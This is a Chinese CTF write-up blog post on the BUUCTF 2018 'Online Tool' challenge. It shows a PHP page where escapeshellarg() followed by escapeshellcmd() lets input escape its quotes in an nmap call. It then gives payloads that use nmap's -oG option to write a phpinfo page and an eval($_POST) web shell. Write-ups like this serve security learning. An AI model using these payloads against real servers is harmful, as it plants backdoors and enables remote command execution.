BUUCTF:[BUUCTF 2018]Online Tool

最新推荐文章于 2022-06-15 19:13:01 发布
于 2020-12-04 01:29:47 发布 1248 收藏 1
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/110605396
版权 
https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool

在这里插入图片描述

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

考查点:

利用escapeshellarg()+escapeshellcmd()的两次转义,导致闭合单引号后即可执行任意参数,然后利用Nmap的-oG参数写入shell

?host='<?php phpinfo();?> -oG 1.php '

?host='<?php eval($_POST["cmd"]);?> -oG shell.php '

在这里插入图片描述
在这里插入图片描述
PS:这里我有个疑问,网上看的题解里面好像都不能清楚的解释为什么?host='<?php eval($_POST["cmd"]);?> -oG shell.php '这里最后的单引号的前面要加个空格,不太明白,有师傅清楚的话,麻烦评论区指点一下,谢谢

末初mochu7
关注
  • 2
    点赞
  • 1
    收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
uLearn - Online Proctoring Tool-crx插件
04-03
语言:English 安全和非侵入性的在线采购方法 ULearn是一款配备AI且具有成本效益的自动化在线监督解决方案,可帮助学术管理员创建和进行防作弊测试,同时尊重学生的隐私。 借助我们的自动标记系统,我们可以确保考试的完整性以及学生的隐私权。 我们提供易于使用的软件,该软件可以完全使用,也可以与您的LMS帐户顺利集成,并获得我们技术专家的24X7支持。 通过可配置的采购设置和可理解的界面,我们为学生提供了一个轻松的环境。 我们的监理服务包括:*智能AI监控*阻止复制粘贴和其他键盘快捷键*学生的视频和音频记录*学生屏幕的实时流式传输*实时聊天以指导学生在教育技术领域拥有5年以上的经验,uLearn由Teno App的开发者提供给您,Teno App是用于管理,学术管理,电子学习,交流等方面的领先教育应用程序。 要了解更多信息,请访问www.ulearn.io
Online-Tools:网页提供各种在线工具
05-10
在线工具 该项目位于 它是Web工具的集合,例如morse到文本转换器,插值工具,哈希函数评估等。 本地运行 可以使用在本地启动: git clone https://github.com/Simsso/Online-Tools online-tools cd online-tools docker-compose build docker-compose up toolstimodenkcom_nginx_1 docker-compose启动一个nginx容器( toolstimodenkcom_nginx_1 ),该容器充当PHP FPM容器( toolstimodenkcom_fpm_1 )的反向代理。 启动后,该页面位于 。 请注意,一些工具依赖于外部服务(可能不可用)。 如果您有反向代理,并且只想将网页与PHP容器一起使用,请确保将块添加到您的配置中。 它将启用更好的URL
OnlineToolsBook::lollipop:在线工具秘籍,为在线工具写一本优质说明书,让在线工具造福人类~ Online tool cheats, write a quality manual for online tools, make online tools benefit humanity~
05-02
「在线工具秘籍」 OnlineToolsBook :lollipop:「在线工具秘籍」, 为在线工具写一本优质开源中文说明书, 让在线工具造福人类~ Online tool cheats, write a quality manual for online tools, make online tools benefit humanity~ 「在线工具秘籍」Github永久开源地址: 「在线工具秘籍」是什么? 从用户角度出发,「理想的工具应该是无需安装, 打开浏览器即可使用」 也就是所谓的在线工具。由于优质的在线工具并不容易被人发掘, 发掘到也不一定能快速上手, 所以我打造了这个 项目,为在线工具写一本优质开源中文说明书,让在线工具造福人类~ 双倍快乐 发掘优质在线工具时,我找到很多惊艳的资源网站,这些惊艳的网站网站也被我收录了进来~ 内容同步更新到公众号「0加1」 公众号 「0加1」 由项目作者zhaoo
online judge tool-crx插件
04-06
语言:日本語 将访问或从问题ID中访问或提交各种在线判断问题。 目前,您可以访问AOJ,UVA,PKU,ACM-ICPC Livearchive,CodeForces问题。 版本0.5输入从弹出窗口到新选项卡的问题编号。 您可以查看打开问题的历史记录。
sqlTool.rar_Online SQL Tool_SQLTool_sqlto
09-24
一个在线的演示SQL语句应用的工具网络应用...
[BUUCTF 2018]Online Tool
m0_62709637的博客
05-09 537
新知识: escapeshellarg()函数: 把字符串转码成可以在shell命令里使用的参数,将单引号进行转义,转义之后,再在左右加单引号; escapeshellcmd()函数: 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将&#;`|*?~<>^()[]{}$\, \x0A和\xFF以及不配对的单/双引号转义; 这两个函数若同时使用,将会产生逻辑漏洞; 个人理解防范原理:将特殊符号进行转译处理,使其变为字符串,从而无法发挥正常作用; 绕过方
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 2761
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
bpm-online:使用bpm'online的软件包
05-08
composer require agoalofalife/bpm-online 设定设定 有几种方法可以设置您的配置数据: 通过类文件 //Инициализируем ядро $kernel = new KernelBpm(); $file = new File(); // у...
MobileUO:MobileUO-Ultima Online的第一个移动客户端!
04-14
MobileUO-Ultima Online的第一个移动客户端! MobileUO在iOS和Android上运行,可让您随时随地播放UO。 加入社区 怎么玩? 按照上的说明为您的移动设备安装和配置MobileUO。 实际观看 点击播放视频 合法的 该项目...
lmeve:LMeve-EVE Online的行业经理和贡献跟踪者
05-22
关于 此项目是应Aideron Technologies首席执行官的要求于2013年启动的。该软件基本上是高级原型。... 我曾计划将整个项目重构为... 此应用需要EVE Online公司首席执行官ESI键才能发挥作用。 所有与夏娃相关的材料都是CCP G
jnoj:Jiangnan Online Judge
05-25
Jiangnan Online Judge江南在线评测系统(Jiangnan Online Judge),是一个在线的判题系统。用户可以在线提交程序多种程序(如C、C++、Java)源代码,系统对源代码进行编译和执行,并通过预先设计的测试数据来检验...
wwo:收集有关 Werewolf Online 或 Wolvesville 游戏的脚本程序和信息
08-03
信息专门提供有关 Werewolf Online 游戏协议的脚本和信息的存储库。 虽然目前正在进行重大工作,但也许您会发现 wiki 对理解游戏的基本机制非常有用。免责声明: 此存储库及其内容仅用于教育目的。 我对攻击任何 ...
Seal Online Tool_tool_ToolsItem.scr_
10-02
for edit item scr seal ofline
BUUCTF-Online Tool
m0_47571887的博客
11-10 461
这道题真的挺不常见的,考的点也有点不常见 打开题目 一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解 大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。 在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
[BUUCTF 2018]Online Tool 1
weixin_46196627的博客
06-15 793
[BUUCTF 2018]Online Tool1查看代码,题目本意是用户输入ip地址,执行nmap扫描 $_SERVER 可以获取服务器和执行环境信息 HTTP_X_FORWARDED_FOR HTTP扩展头部,用来表示http请求端真实ip REMOTE_ADDR代表客户端的IP,但它的值不是由客户端提供的,而是服务端根据客户端的ip指定的,当你的浏览器访问某个网站时,假设中间没有任何代理,那么网站的web服务器(Nginx,Apache等)就会把remote_addr设为你的机器IP,如果你用了某个代
[BUUCTF 2018]Online Tool (escapeshellarg和escapeshellcmd双写利用)
qq_44749590的博客
05-18 260
BUUCTF 2018 Online Tool PHP escapeshellarg()+escapeshellcmd()
error adding symbols: dso missing from command line
最新发布
03-16
这个错误消息表示缺少 dso (动态共享库),无法在命令行中添加符号。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

谢谢老板!

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值